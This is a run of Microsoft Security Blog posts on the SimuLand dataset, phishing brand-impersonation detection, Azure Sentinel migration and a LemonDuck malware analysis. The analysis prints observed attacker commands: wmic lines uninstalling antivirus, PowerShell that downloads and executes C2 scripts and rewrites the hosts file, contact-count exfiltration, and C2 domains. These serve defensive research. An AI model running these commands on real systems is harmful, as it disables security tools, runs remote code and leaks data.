Sharing the first SimuLand dataset to expedite research and learn about adversary tradecraft

August 5th, 2021 No comments

Last month, we introduced the SimuLand project to help security researchers around the world deploy lab environments to reproduce well-known attack scenarios, actively test detections, and learn more about the underlying behavior and implementation of adversary techniques. Since the release of the project, we have worked on a second phase to improve the current documentation and collect the telemetry generated after running the simulation plans in the lab guides.

Today, we are excited to release a dataset generated from the first simulation scenario to provide security researchers with an option to access data mapped to attack behavior without deploying the full environment.

Sharing SimuLand data to expedite research

In our previous blog post, we showed a basic threat research methodology and where the SimuLand project fits. One of the next steps after a simulation is the collection and analysis of the data generated. We believe we can help expedite the research process by sharing the security events generated during testing.

Map of a threat research methodology emphasizing SimuLand and Security Datasets.

Figure 1: Map of a threat research methodology emphasizing SimuLand and Security Datasets.

What security events?

The data that you could collect from a SimuLand scenario depends on the adversary tradecraft simulated and the security controls in place. Based on the first simulation scenario, these are some of the security events you can collect and map to adversary behavior:

Adversarial techniques mapped to sources of data.

Figure 2: Adversarial techniques mapped to sources of data.

How are security events collected?

Security events generated during a simulation can be collected using the following APIs:

Where can I download the dataset from?

Rather than creating a new GitHub repository and storing all the security events generated, we are contributing every single dataset to the GitHub repository of the Security Datasets project. This is a community-driven effort developed to share pre-recorded datasets with the Information Security (InfoSec) community to expedite data analysis and threat research. This is another open-source initiative created and maintained by the Open Threat Research community.

You can find our first dataset here.

What can you do with the dataset?

Besides empowering security researchers to understand the underlying behavior of attack techniques, sharing a dataset also helps to:

  • Expedite the development and validation of detection rules.
  • Identify and validate a chain of events to model adversary behavior.
  • Facilitate labeled and unlabeled data for initial research and feature development.
  • Automate simulation exercises by injecting pre-recorded events into data pipelines.
  • Complement training material and expedite the creation of data analysis use cases.
  • Expedite the creation of internal or community events, such as capture-the-flag or hackathons, where the data is used to create challenges and encourage collaboration.

What’s next

With this first dataset, we commit ourselves to release the security events we generate in our lab environment along with new lab guides. We also hope you can help us identify new sources of data to improve the project and data collection strategy.

Learn more

To learn more about this open-source initiative, visit the SimuLand GitHub repository.

To learn more about Microsoft Security solutions, visit our website. Bookmark the Security blog to keep up with our expert coverage on security matters. Also, follow us at @MSFTSecurity for the latest news and updates on cybersecurity.

The post Sharing the first SimuLand dataset to expedite research and learn about adversary tradecraft appeared first on Microsoft Security Blog.

Categories: cybersecurity Tags:

Spotting brand impersonation with Swin transformers and Siamese neural networks

August 4th, 2021 No comments

Every day, Microsoft Defender for Office 365 encounters around one billion brand impersonation emails. Our security solutions use multiple detection and prevention techniques to help users avoid divulging sensitive information to phishers as attackers continue refining their impersonation tricks. In this blog, we discuss our latest innovation toward developing another detection layer focusing on the visual components of brand impersonation attacks. We presented this approach in our Black Hat briefing Siamese neural networks for detecting brand impersonation today.

Before a brand impersonation detection system can be trained to distinguish between legitimate and malicious email that use the same visual elements, we must first teach it to identify what brand the content is portraying in the first place. Using a combination of machine learning techniques that convert images to real numbers and can perform accurate judgments even with smaller datasets, we have developed a detection system that outperforms all visual fingerprint-based benchmarks on all metrics while maintaining a 90% hit rate. Our system is not simply “memorizing” logos but is making decisions based on other salient aspects such as color schemes or fonts. This, among other state-of-the-art AI that feeds into Microsoft 365 Defender, improves our protection capabilities against the long-standing problem of phishing attacks.

Two-step approach to spot impersonations

In brand impersonation attacks, an email or a website is designed to appear visually identical to a known legitimate brand, like Microsoft 365 or LinkedIn, but the domain—to which user-inputted information, like passwords or credit card details, is sent—is actually controlled by an attacker. Examples of a malicious sign-in page impersonating Microsoft is shown in Figure 1.

Figure 1. Example of a Microsoft brand impersonation attempt

Any vision-based system, computer or human, that detects brand impersonation attacks must take a two-step approach upon receiving content:

  1. Determine whether the content looks like content from a known brand, and if so, which brand
  2. Determine if other artifacts associated with the content (such as URLs, domain names, or certificates) match those used by the identified brand

For example, if a brand impersonation detection system sees an image that appears to come from Microsoft but also notices that the URL is indeed from Microsoft and that the certificate matches a known certificate issued to Microsoft, then the content would be classified as legitimate.

However, if the detector encounters content which shares visual characteristics with legitimate Microsoft content like in Figure 1, but then notices that the URL associated with the content is an unknown or unclassified URL with a suspicious certificate, then the content would be flagged as a brand impersonation attack.

Training our system to identify brands

The key to an effective brand impersonation detection system is identifying known brands as reliably as possible. This is true for both a manual system and an automated one. For sighted humans, the process of identifying brands is straightforward. On the other hand, teaching an automated system to identify brands is more challenging. This is especially true because each brand might have several visually distinct sign-in pages.

For example, Figure 2 shows two Microsoft Excel brand impersonation attempts. While both cases share some visual characteristics, the differences in background, color, and text make the creation of rule-based systems to detect brands based on rudimentary similarity metrics (such as robust image hashing) more difficult. Therefore, our goal was to improve brand labeling, which will ultimately improve brand impersonation detection.

Figure 2. Another examples of brand impersonation attempt targeting Microsoft Excel

Of course, deep learning is the assumed default tool for image recognition, so it was only natural to perform brand detection by combining labeled brand images with modern deep-learning techniques. To do this, we first sought out, captured, and manually labeled over 50,000 brand impersonation screenshots using our own detonation system.

While our dataset consisted of over 1,300 distinct brands, most brands were not well-represented. Appearing less than 5 times are 896 brands while 541 brands only appeared in the dataset once. The lack of significant representation for each brand meant that using standard approaches like a convolutional neural network would not be feasible.

Converting images to real numbers via embeddings

To address the limitations of our data, we adopted a cutting-edge, few-shot learning technique known as Siamese neural networks (sometimes called neural twin networks). However, before explaining what a Siamese neural network is, it is important to understand how embedding-based classifiers work.

Building an embedding-based classifier proceeds in two steps. The first step is to embed the image into a lower dimensional space. All this means is that the classifier transforms the pixels that make up the images into a vector of real numbers. So, for example, the network might take as an input the pixel values in Figure 1 and output the value (1.56, 0.844). Because the network translates the images into two real numbers, we say the network embeds the images into a two-dimensional space.

While in practice we use more than a two-dimensional embedding, Figure 3 shows all our images embedded in two-dimensional space. The red dots represent the embeddings of images all appearing to be from one brand. This effectively translates the visual data into something our neural network can digest.

Figure 3: A two-dimensional representation of embeddings, where the red dots represent one brand

Given the embeddings, the second step of the algorithm is to classify the embedded images. For example, given a set of embedded screenshots and a new screenshot we call X, we can perform brand classification by embedding X and then assigning to X the brand whose image is “closest” to X in the embedded space.

Training the system to minimize contrastive loss

In understanding the two-dimensional embeddings above, readers might assume that there was an “embedder” that placed screenshots of the same brand close together, or at least that there was some inherent meaning in the way the images were embedded. Of course, neither was true. Instead, we needed to train our detector to do this.

This is where Siamese neural networks with an associated contrastive loss come into play. A Siamese network takes as an input two raw images and embeds them both. The contrastive loss the network computes is the distance between the images if the images come from the same brand and the negative of the distance between the images if they come from a different brand. This means that when a Siamese network is trained to minimize losses, it embeds screenshots of the same brand close together and screenshots of different brands far apart. An example of how the network minimizes losses is shown in Figure 4.

Figure 4. Successful Siamese network embeddings. The network minimizes loss by embedding screenshots that pertain to Microsoft close together while simultaneously embedding screenshots from Microsoft and LinkedIn far apart. Note that the algorithm is trained on entire screenshots and not just logos. The logos are used here for illustrative purposes only.

We also mentioned that the Siamese network can perform any type of classification on the embedded images. Therefore, we used standard feedforward neural networks to train the system to perform the classification. The full architecture is illustrated in Figure 5 below. The images were first embedded into a low dimensional space using Swin transformers, a cutting edge computer-vision architecture. The embeddings were then used to calculate the contrastive loss. Simultaneously, the embeddings were fed into a feedforward neural network which then outputted the predicted class. When training the system, the total loss is the sum of the contrastive loss and a standard log-likelihood loss based on the output of both classification networks.

Figure 5. Siamese neural network architecture

Basing success metrics on costs and benefits of correct labelling

Since this is a multi-class classification system, we needed to be careful about how we defined our metrics for success. Specifically, the notions of a true positive or a false negative are not well-defined in multi-class classification problems. Therefore, we developed metrics based on the associated costs and benefits of real-world outcomes. For example, the cost of mislabeling a known brand as another known brand is not the same as observing a never-before-seen brand but labeling it as a known brand. Furthermore, we separated our metrics for known and unknown brands. As a result, we developed the following five metrics:

  1. Hit rate – the proportion of known brands that are correctly labeled
  2. Known misclassification rate – the proportion of known brands that are incorrectly labeled as another known brand
  3. Incorrect unknown rate – the proportion of known brands that are incorrectly labeled as an unknown brand
  4. Unknown misclassification rate – the proportion of screenshots of unknown brands that are labeled as a known brand
  5. Correct unknown rate – the proportion of unknown brands that are correctly labeled as unknown

These metrics are also summarized in Figure 6 below. Since all our images were labeled, we simulated an unknown brand by removing all brands with only one screenshot from the training set and only used them for evaluating our metrics on a held-out test set.

Figure 6. Classification metrics. Metrics with upward-facing triangles indicate that the results are better when they are higher. Metrics with downward-facing triangles are better when they are lower.

Outperforming visual fingerprint-based benchmarks

The main results of our brand impersonation classification system are given in Figure 7 but are straightforward to summarize: Our system outperforms all visual fingerprint-based benchmarks on all metrics while still maintaining a 90% hit rate. The results also show that if instead of maximizing hit rate, it was more beneficial to minimize the known misclassification rate, it is possible to have the known misclassification rate be less than 2% while the hit rate remains above 60% and the Siamese network still beats the visual fingerprint-based approaches on all metrics.

Figure 7. Results of how our system fared against other image recognition systems

We can further examine some examples to show that the network did not simply memorize the screenshots and can correctly label variations on the same brand. Figure 8 shows two different malicious DHL brand impersonation sign-in pages. Despite a different visual layout and color scheme (use of a black bar in the left image, white on the right), the network still correctly classified both. Furthermore, the network was able to correctly classify the image on the left even though it carried several logos of other companies on the bottom bar. This means that the network is doing more than just logo recognition and making decisions based on other features such as color schemes or the dominant font style.

Figure 8. Variations on the DHL sign-in page, both classified correctly by our system as pertaining to DHL

Important applications in detecting phishing campaigns

Phishers have become particularly good at creating phishing websites or crafting emails that closely resemble known legitimate brands visually. This allows them to gain users’ trust and trick them into disclosing sensitive information.

Our work prevents attackers from hijacking legitimate brands by detecting entities that visually look like legitimate brands but do not match other known characteristics or features of that brand. Moreover, this work helps us with threat intelligence generation by clustering known attacks or phishing kits based on the specific brands they target visually and identifying new attack techniques that might impersonate the same brand but employ other attack techniques.

Dedicated research teams in Microsoft stay on top of threats by constantly improving the AI layers that support our threat intelligence which then feeds into our ability to protect against and detect threats. Microsoft Defender for Office 365 protects against email-based threats like phishing and empowers security operations teams to investigate and remediate attacks. Threat data from Defender for Office 365 then increases the quality of signals analyzed by Microsoft 365 Defender, allowing it to provide cross-domain defense against sophisticated attacks.


Justin Grana, Yuchao Dai, Jugal Parikh, and Nitin Kumar Goel

Microsoft 365 Defender Research Team

The post Spotting brand impersonation with Swin transformers and Siamese neural networks appeared first on Microsoft Security Blog.

Congratulations to the MSRC 2021 Most Valuable Security Researchers!

August 4th, 2021 No comments

The MSRC Researcher Recognition Program offers public thanks and acknowledgement to the researchers who help protect customers through discovering and sharing security vulnerabilities under Coordinated Vulnerability Disclosure. Today, we are excited to recognize this year’s Most Valuable Security Researchers (MVRs) based on the impact, accuracy, and volume of their reports. Congratulations to each of our MSRC …

Congratulations to the MSRC 2021 Most Valuable Security Researchers! Read More »

How to manage a side-by-side transition from your traditional SIEM to Azure Sentinel

August 3rd, 2021 No comments

With every week bringing new headlines about crippling cyberattacks, and with organizations growing increasingly distributed, security teams are constantly asked to do more with less. Moving to cloud-native security information and event management (SIEM) can help security teams analyze data with the scale of the cloud, and empowers them to focus on protecting the organization, not managing infrastructure. As the industry’s first cloud-native security operation and automated response (SIEM+SOAR), Azure Sentinel provides security analytics across the organization to fight today’s sophisticated cyber threats. It does this by collecting data across the digital estate—including on-premises systems, software as a service (SaaS) applications, and non-Microsoft cloud environments such as Amazon Web Services (AWS), Linux, or firewalls—and cross-correlating it using AI and machine learning, enabling security operations (SecOps) teams to stop threats before they do damage.

In part one of this three-part series, we explored the first three steps every SecOps team should take to help ensure a successful migration to Azure Sentinel. For part two, we’ll look at ways to manage the transitional phase of your migration. Specifically, we’ll compare the pros and cons of a short-term versus long-term side-by-side deployment, including an examination of the five types of side-by-side configurations, and which one maximizes value from both Azure Sentinel and your traditional SIEM.

What is the transitional phase in a cloud-native SIEM migration?

For an organization using an on-premises SIEM, migration to the cloud typically requires a three-stage process:

  1. Planning and starting the migration.
  2. Running Azure Sentinel side-by-side with your on-premises SIEM (transitional phase).
  3. Completing the migration (moving completely off the on-premises SIEM).

Step 2, the transitional phase, involves running Azure Sentinel in a side-by-side configuration either as a short-term solution or as a medium-to-long-term operational model. Both approaches culminate in a completely cloud-hosted SIEM architecture; the difference is: how long does it serve your interests to remain tethered to your traditional SIEM?

Transitional side-by-side (recommended)

This approach involves running Azure Sentinel side-by-side with your traditional SIEM just long enough to complete the migration to Azure Sentinel.

Pros: Gives your staff time to adapt to new processes as workloads and analytics migrate. Gains deep correlation across all data sources for hunting scenarios; eliminates having to do swivel-chair analytics between SIEMs or author forwarding rules (and close investigations) in two places. Also enables your SecOps team to quickly downgrade traditional SIEM solutions, eliminating infrastructure and licensing costs.

Cons: Can require a shortened learning curve for SecOps staff.

Medium-to-long-term side-by-side

Involves leveraging both SIEMs side-by-side to analyze different subsets of data indefinitely. In this model, some organizations choose to take an extended side-by-side approach over a long period of time, or even plan to run side-by-side permanently.

Pros: Leverage Azure Sentinel’s key benefits—including AI, machine learning, and investigation capabilities—without moving completely away from your traditional SIEM. Saves money compared to your traditional SIEM by analyzing your cloud or Microsoft data in Azure Sentinel.

Cons: Separating analytics across two different databases results in greater complexity (for example split case management and investigations for multi-environment incidents). Greater staff and infrastructure costs. Requires staff to be knowledgeable in two different SIEM solutions. It also results in a much longer time to universal value for Azure Sentinel if the intention is to ultimately migrate to a single SIEM.

What’s the best approach for side-by-side SIEM deployment?

There are five basic deployment models for the side-by-side phase of the migration process. Some of these approaches may seem easier to implement but can introduce unwanted complexity in the long run. Let’s run through the advantages and drawbacks of each:

Approach 1: Moving logs from Azure Sentinel to your traditional SIEM

In this configuration, organizations use Azure Sentinel only as a log relay, forwarding logs to their existing on-premises SIEM. This approach is not recommended, since running Azure Sentinel strictly as a log-relay means you’ll continue to experience the same cost and scale challenges as with your on-premises SIEM. In addition, you’ll be paying for data ingestion in Azure Sentinel along with storage costs in your traditional SIEM. Another drawback: using Azure Sentinel merely as a log relay means you’ll miss out on Azure Sentinel’s full SIEM+SOAR capabilities, including detections, analytics, AI, investigation, and automation tools.

Approach 2: Moving logs from your traditional SIEM to Azure Sentinel

In this approach, your SecOps team forwards logs from your traditional SIEM to Azure Sentinel. For reasons similar to the above, this approach is not recommended. While you’ll be able to benefit from the full functionality of Azure Sentinel without the capacity limitations of an on-premises SIEM, your organization still will be paying for data ingestion to two different vendors. In addition to adding architecture complexity, this model can result in higher costs for your business.

Approach 3: Using Azure Sentinel and your traditional SIEM as separate solutions

In this model, your team uses Azure Sentinel to analyze cloud data while continuing to use your on-premises SIEM to analyze other data sources. This setup allows for clear boundaries regarding when to use which solution, and it avoids the duplication of costs. However, cross-correlation between the two becomes difficult; so this scenario is not recommended. In today’s landscape—where threats often move laterally across the organization—such gaps in visibility pose a significant risk.

Approach 4: Sending alerts and enriched incidents from Azure Sentinel to your traditional SIEM

In this approach, you’ll analyze cloud data in Azure Sentinel, then send the alerts generated to your traditional SIEM. There, you can continue to use your traditional SIEM as your single pane of glass and do any cross-correlation on alerts generated by Azure Sentinel. Though it avoids duplicating costs while giving you the freedom to migrate at your own pace, this configuration is still suboptimal. Simply forwarding enriched incidents to your traditional SIEM limits the value you could be getting from Azure Sentinel’s investigation, hunting, and automation capabilities.

Approach 5: Sending alerts from your traditional SIEM to Azure Sentinel

In this configuration, your SecOps team will ingest and analyze cloud data within Azure Sentinel while using the traditional SIEM to analyze on-premises data—generating alerts back to Azure Sentinel. In this way, your team is free to do cross-correlation and investigation within Azure Sentinel as your single pane of glass, and still access your traditional SIEM for deeper investigation if needed. This is our recommended side-by-side migration method because it allows you to get full value from Azure Sentinel while migrating data at a pace that’s right for your organization.

Coming soon in part 3: Use case migration

In the third and final post in this series, we’ll examine best practices for migrating your data sources and detections, including how to get the most from Azure Sentinel’s powerful automation capabilities. We’ll also offer some tips for finishing the migration and moving completely off your traditional SIEM. For a complete overview of the migration journey, download the white paper: Azure Sentinel Migration Fundamentals.

To learn more about Microsoft Security solutions, visit our website. Bookmark the Security blog to keep up with our expert coverage on security matters. Also, follow us at @MSFTSecurity for the latest news and updates on cybersecurity.

The post How to manage a side-by-side transition from your traditional SIEM to Azure Sentinel appeared first on Microsoft Security Blog.

Categories: cybersecurity Tags:

When coin miners evolve, Part 2: Hunting down LemonDuck and LemonCat attacks

July 29th, 2021 No comments

[Note: In this two-part blog series, we expose a modern malware infrastructure and provide guidance for protecting against the wide range of threats it enables. Part 1 covered the evolution of the threat, how it spreads, and how it impacts organizations. Part 2 provides a deep dive on the attacker behavior and outlines investigation guidance.]

LemonDuck is an actively updated and robust malware primarily known for its botnet and cryptocurrency mining objectives. As we discussed in Part 1 of this blog series, in recent months LemonDuck adopted more sophisticated behavior and escalated its operations. Today, beyond using resources for its traditional bot and mining activities, LemonDuck steals credentials, removes security controls, spreads via emails, moves laterally, and ultimately drops more tools for human-operated activity.

LemonDuck spreads in a variety of ways, but the two main methods are (1) compromises that are either edge-initiated or facilitated by bot implants moving laterally within an organization, or (2) bot-initiated email campaigns. After installation, LemonDuck can generally be identified by a predictable series of automated activities, followed by beacon check-in and monetization behaviors, and then, in some environments, human-operated actions.

In this blog post, we share our in-depth technical analysis of the malicious actions that follow a LemonDuck infection. These include general and automatic behavior, as well as human-operated actions. We also provide guidance for investigating LemonDuck attacks, as well as mitigation recommendations for strengthening defenses against these attacks.

Diagram showing chain of attacks from the LemonDuck and LemonCat infrastructure, detailing specific attacker behavior common to both and highlight behavior unique to each infra

Figure 2. LemonDuck attack chain from the Duck and Cat infrastructures

External or human-initialized behavior

LemonDuck activity initiated from external applications – as against self-spreading methods like malicious phishing mail – is generally much more likely to begin with or lead to human-operated activity. These activities always result in more invasive secondary malware being delivered in tandem with persistent access being maintained through backdoors. These human-operated activities result in greater impact than standard infections.

In March and April 2021, various vulnerabilities related to the ProxyLogon set of Microsoft Exchange Server exploits were utilized by LemonDuck to install web shells and gain access to outdated systems. Attackers then used this access to launch additional attacks while also deploying automatic LemonDuck components and malware.

In some cases, the LemonDuck attackers used renamed copies of the official Microsoft Exchange On-Premises Mitigation Tool to remediate the vulnerability they had used to gain access. They did so while maintaining full access to compromised devices and limiting other actors from abusing the same Exchange vulnerabilities.

This self-patching behavior is in keeping with the attackers’ general desire to remove competing malware and risks from the device. This allows them to limit visibility of the attack to SOC analysts within an organization who might be prioritizing unpatched devices for investigation, or who would overlook devices that do not have a high volume of malware present.

The LemonDuck operators also make use of many fileless malware techniques, which can make remediation more difficult. Fileless techniques, which include persistence via registry, scheduled tasks, WMI, and startup folder, remove the need for stable malware presence in the filesystem. These techniques also include utilizing process injection and in-memory execution, which can make removal non-trivial. It is therefore imperative that organizations that were vulnerable in the past also direct action to investigate exactly how patching occurred, and whether malicious activity persists.

On the basic side of implementation this can mean registry, scheduled task, WMI and startup folder persistence to remove the necessity for stable malware presence in the filesystem. However, many free or easily available RATs and Trojans are now routinely utilizing process injection and in-memory execution to circumvent easy removal. To rival these kinds of behaviors it’s imperative that security teams within organizations review their incident response and malware removal processes to include all common areas and arenas of the operating system where malware may continue to reside after cleanup by an antivirus solution.

General, automatic behavior

If the initial execution begins automatically or from self-spreading methods, it typically originates from a file called Readme.js. This behavior could change over time, as the purpose of this .js file is to obfuscate and launch the PowerShell script that pulls additional scripts from the C2. This JavaScript launches a CMD process that subsequently launches Notepad as well as the PowerShell script contained within the JavaScript.

In contrast, if infection begins with RDP brute force, Exchange vulnerabilities, or other vulnerable edge systems, the first few actions are typically human-operated or originate from a hijacked process rather than from Readme.js. After this, the next few actions that the attackers take, including the scheduled task creation,  as well as the individual components and scripts are generally the same.

One of these actions is to establish fileless persistence by creating scheduled tasks that re-run the initial PowerShell download script. This script pulls its various components from the C2s at regular intervals. The script then checks to see if any portions of the malware were removed and re-enables them. LemonDuck also maintains a backup persistence mechanism through WMI Event Consumers to perform the same actions.

To host their scripts, the attackers use multiple hosting sites, which as mentioned are resilient to takedown. They also have multiple scheduled tasks to try each site, as well as the WMI events in case other methods fail. If all of those fail, LemonDuck also uses its access methods such as RDP, Exchange web shells, Screen Connect, and RATs to maintain persistent access. These task names can vary over time, but “blackball”, “blutea”, and “rtsa” have been persistent throughout 2020 and 2021 and are still seen in new infections as of this report.

LemonDuck attempts to automatically disable Microsoft Defender for Endpoint real-time monitoring and adds whole disk drives –  specifically the C:\ drive – to the Microsoft Defender exclusion list. This action could in effect disable Microsoft Defender for Endpoint, freeing the attacker to perform other actions. Tamper protection prevents these actions, but it’s important for organizations to monitor this behavior in cases where individual users set their own exclusion policy.

LemonDuck then attempts to automatically remove a series of other security products through CMD.exe, leveraging WMIC.exe. The products that we have observed LemonDuck remove include ESET, Kaspersky, Avast, Norton Security, and MalwareBytes. However, they also attempt to uninstall any product with “Security” and “AntiVirus” in the name by running the following commands:

cmd /c start /b wmic.exe product where “name like ‘%Security%’” call uninstall /
cmd /c start /b wmic.exe product where “name like ‘%AntiVirus%’” call uninstall /

Custom detections in Microsoft Defender for Endpoint or other security solutions can raise alerts on behaviors indicating interactions with security products that are not deployed in the environment. These alerts can allow the quick isolation of devices where this behavior is observed. While this uninstallation behavior is common in other malware, when observed in conjunction with other LemonDuck TTPs, this behavior can help validate LemonDuck infections.

LemonDuck leverages a wide range of free and open-source penetration testing tools. It also uses freely available exploits and functionality such as coin mining. Because of this, the order and the number of times the next few activities are run can change. The attackers can also change the threat’s presence slightly depending on the version, the method of infection, and timeframe. Many .exe and .bin files are downloaded from C2s via encoded PowerShell commands. These domains use a variety names such as the following:

  • ackng[.]com
  • bb3u9[.]com
  • ttr3p[.]com
  • zz3r0[.]com
  • sqlnetcat[.]com
  • netcatkit[.]com
  • hwqloan[.]com
  • 75[.]ag
  • js88[.]ag
  • qq8[.]ag

In addition to directly calling the C2s for downloads through scheduled tasks and PowerShell, LemonDuck exhibits another unique behavior: the IP addresses of a smaller subset of C2s are calculated and paired with a previously randomly generated and non-real domain name. This information is then added into the Windows Hosts file to avoid detection by static signatures. In instances where this method is seen, there is a routine to update this once every 24 hours. An example of this is below:

powershell.EXE -c "$Lemon_Duck='\g0B4wCb';$x='ASTJK'+'';[Net.Dns]::GetHostAddresses('t.tr2'+'')[0].IPAddressToString+' '+$x|out-file -"encoding" as`ci`i c:\windows\system32\drivers\etc\hosts;$y='http://'+$x+'/w.js';$z=$y+'p';$m=(Ne`w-Obj`ect Net.WebC`lient)."DownloadData"($y);[System.Security.Cryptography.MD5]::Create().ComputeHash($m)|foreach{$s+=$_.ToString('x2')};if($s-eq'a49add2a8eeb7e89b9d743c0af0e1443'){IEX(-join[char[]]$m)}"

LemonDuck is known to use custom executables and scripts. It also renames and packages well-known tools such as XMRig and Mimikatz. Of these, the three most common are the following, though other packages and binaries have been seen as well, including many with .ori file extensions:

  • IF.BIN (used for lateral movement and privilege escalation)
  • KR.BIN (used for competition removal and host patching)
  • M[0-9]{1}[A-Z]{1}.BIN, M6.BIN, M6.BIN.EXE, or M6G.Bin (used for mining)

Executables used throughout the infection also use random file names sourced from the initiating script, which selects random characters, as evident in the following code:

$ename=-join([char[]](48..57+65..90+97..122)|Get-Random -Count (6+(Get-Random)%6)) + ".exe"

Lateral movement and privilege escalation

IF.Bin, whose name stands for “Infection”, is the most common name used for the infection script during the download process. LemonDuck uses this script at installation and then repeatedly thereafter to attempt to scan for ports and perform network reconnaissance. It then attempts to log onto adjacent devices to push the initial LemonDuck execution scripts.

IF.Bin attempts to move laterally via any additional attached drives. When drives are identified, they are checked to ensure that they aren’t already infected. If they aren’t, a copy of Readme.js, as well as subcomponents of IF.Bin, are downloaded into the drive’s home directory as hidden.

Similarly, IF.Bin attempts to brute force and use vulnerabilities for SMB, SQL, and other services to move laterally. It then immediately contacts the C2 for downloads.

Another tool dropped and utilized within this lateral movement component is a bundled Mimikatz, within a mimi.dat file associated with both the “Cat” and “Duck” infrastructures. This tool’s function is to facilitate credential theft for additional actions. In conjunction with credential theft, IF.Bin drops additional .BIN files to attempt common service exploits like CVE-2017-8464 (LNK remote code execution vulnerability) to increase privilege.

The attackers regularly update the internal infection components that the malware scans for. They then attempt brute force or spray attacks, as well as exploits against available SSH, MSSQL, SMB, Exchange, RDP, REDIS and Hadoop YARN for Linux and Windows systems. A sample of ports that recent LemonDuck infections were observed querying include 70001, 8088, 16379, 6379, 22, 445, and 1433.

Other functions built in and updated in this lateral movement component include mail self-spreading. This spreading functionality evaluates whether a compromised device has Outlook. If so, it accesses the mailbox and scans for all available contacts. It sends the initiating infecting file as part of a .zip, .js, or .doc/.rtf file with a static set of subjects and bodies. The mail metadata count of contacts is also sent to the attacker, likely to evaluate its effectiveness, such as in the following command:

(New-object net.webclient).downloadstring("DOWN_URL/report.json?type=mail&u=$muser&c1="+$contacts.count+"&c2="+$sent_tos.count+"&c3="+$recv_froms.count)

Competition removal and host patching

At installation and repeatedly afterward, LemonDuck takes great lengths to remove all other botnets, miners, and competitor malware from the device. It does this via KR.Bin, the “Killer” script, which gets its name from its function calls. This script attempts to remove services, network connections, and other evidence from dozens of competitor malware via scheduled tasks. It also closes well-known mining ports and removes popular mining services to preserve system resources. The script even removes the mining service it intends to use and simply reinstalls it afterward with its own configuration.

This “Killer” script is likely a continuation of older scripts that were used by other botnets such as GhostMiner in 2018 and 2019. The older variants of the script were quite small in comparison, but they have since grown, with additional services added in 2020 and 2021. Presently, LemonDuck seems consistent in naming its variant KR.Bin. This process spares the scheduled tasks created by LemonDuck itself, including various PowerShell scripts as well as a task called “blackball”, “blutea”, or “rtsa”, which has been in use by all LemonDuck’s infrastructures for the last year along with other task names.

The attackers were also observed manually re-entering an environment, especially in instances where edge vulnerabilities were used as an initial entry vector. The attackers also patch the vulnerability they used to enter the network to prevent other attackers from gaining entry. As mentioned, the attackers were seen using a copy of a Microsoft-provided mitigation tool for Exchange ProxyLogon vulnerability, which they hosted on their infrastructure, to ensure other attackers don’t gain web shell access the way they had. If unmonitored, this scenario could potentially lead to a situation where, if a system does not appear to be in an unpatched state, suspicious activity that occurred before patching could be ignored or thought to be unrelated to the vulnerability.

Weaponization and continued impact

A miner implant is downloaded as part of the monetization mechanism of LemonDuck. The implant used is usually XMRig, which is a favorite of GhostMiner malware, the Phorpiex botnet, and other malware operators. The file uses any of the following names:

  • M6.bin
  • M6.bin.ori
  • M6G.bin
  • M6.bin.exe
  • <File name that follows the regex pattern M[0-9]{1}[A-Z]{1}>.BIN.

Once the automated behaviors are complete, the threat goes into a consistent check-in behavior, simply mining and reporting out to the C2 infrastructure and mining pools as needed with encoded PowerShell commands such as those below (decoded):

cmd.EXE /c "set A=power& call %A%shell -ep bypass -e $Lemon_Duck='MicroSoft\Windows\FtLSO\nKOlou';$y='';$z=$y+'p'+'?ipc_ "';$m=(New-Object System.Net.WebClient).DownloadData($y);[System.Security.Cryptography.MD5]::Create().ComputeHash($m)|foreach{$s+=$_.ToString('x2')};if($s-eq'Øœì


Other systems that are affected bring in secondary payloads such as Ramnit, which is a very popular Trojan that has been seen being dropped by other malware in the past. Additional backdoors, other malware implants, and activities continuing long after initial infection, demonstrating that even a “simple” infection by a coin mining malware like LemonDuck can persist and bring in more dangerous threats to the enterprise.

Comprehensive protection against a wide-ranging malware operation

The cross-domain visibility and coordinated defense delivered by Microsoft 365 Defender is designed for the wide range and increasing sophistication of threats that LemonDuck exemplifies. Below we list mitigation actions, detection information, and advanced hunting queries that Microsoft 365 Defender customers can use to harden networks against threats from LemonDuck and other malware operations.


Apply these mitigations to reduce the impact of LemonDuck. Check the recommendations card for the deployment status of monitored mitigations.

  • Prevent threats from arriving via removable storage devices by blocking these devices on sensitive endpoints. If you allow removable storage devices, you can minimize the risk by turning off autorun, enabling real-time antivirus protection, and blocking untrusted content. Learn about stopping threats from USB devices and other removable media.
  • Ensure that Linux and Windows devices are included in routine patching, and validate protection against the CVE-2019-0708, CVE-2017-0144, CVE-2017-8464, CVE-2020-0796, CVE-2021-26855, CVE-2021-26858, and CVE-2021-27065 vulnerabilities, as well as against brute-force attacks in popular services like SMB, SSH, RDP, SQL, and others.
  • Turn on PUA protection. Potentially unwanted applications (PUA) can negatively impact machine performance and employee productivity. In enterprise environments, PUA protection can stop adware, torrent downloaders, and coin miners.
  • Turn on tamper protection featuresto prevent attackers from stopping security services.
  • Turn on cloud-delivered protectionand automatic sample submission on Microsoft Defender Antivirus. These capabilities use artificial intelligence and machine learning to quickly identify and stop new and unknown threats.
  • Encourage users to use Microsoft Edge and other web browsers that support SmartScreen, which identifies and blocks malicious websites, including phishing sites, scam sites, and sites that contain exploits and host malware. Turn on network protectionto block connections to malicious domains and IP addresses.
  • Check your Office 365 antispam policyand your mail flow rules for allowed senders, domains and IP addresses. Apply extra caution when using these settings to bypass antispam filters, even if the allowed sender addresses are associated with trusted organizations—Office 365 will honor these settings and can let potentially harmful messages pass through. Review system overrides in threat explorer to determine why attack messages have reached recipient mailboxes.

Attack surface reduction

Turn on the following attack surface reduction rules, to block or audit activity associated with this threat:

Antivirus detections

Microsoft Defender Antivirus detects threat components as the following malware:

  • TrojanDownloader:PowerShell/LemonDuck!MSR
  • TrojanDownloader:Linux/LemonDuck.G!MSR
  • Trojan:Win32/LemonDuck.A
  • Trojan:PowerShell/LemonDuck.A
  • Trojan:PowerShell/LemonDuck.B
  • Trojan:PowerShell/LemonDuck.C
  • Trojan:PowerShell/LemonDuck.D
  • Trojan:PowerShell/LemonDuck.E
  • Trojan:PowerShell/LemonDuck.F
  • Trojan:PowerShell/LemonDuck.G
  • TrojanDownloader:PowerShell/LodPey.A
  • TrojanDownloader:PowerShell/LodPey.B
  • Trojan:PowerShell/Amynex.A
  • Trojan:Win32/Amynex.A

Endpoint detection and response (EDR) alerts

Alerts with the following titles in the security center can indicate threat activity on your network:

  • LemonDuck botnet C2 domain activity
  • LemonDuck malware

The following alerts might also indicate threat activity associated with this threat. These alerts, however, can be triggered by unrelated threat activity and are not monitored in the status cards provided with this report.

  • Suspicious PowerShell command line
  • Suspicious remote activity
  • Suspicious service registration
  • Suspicious Security Software Discovery
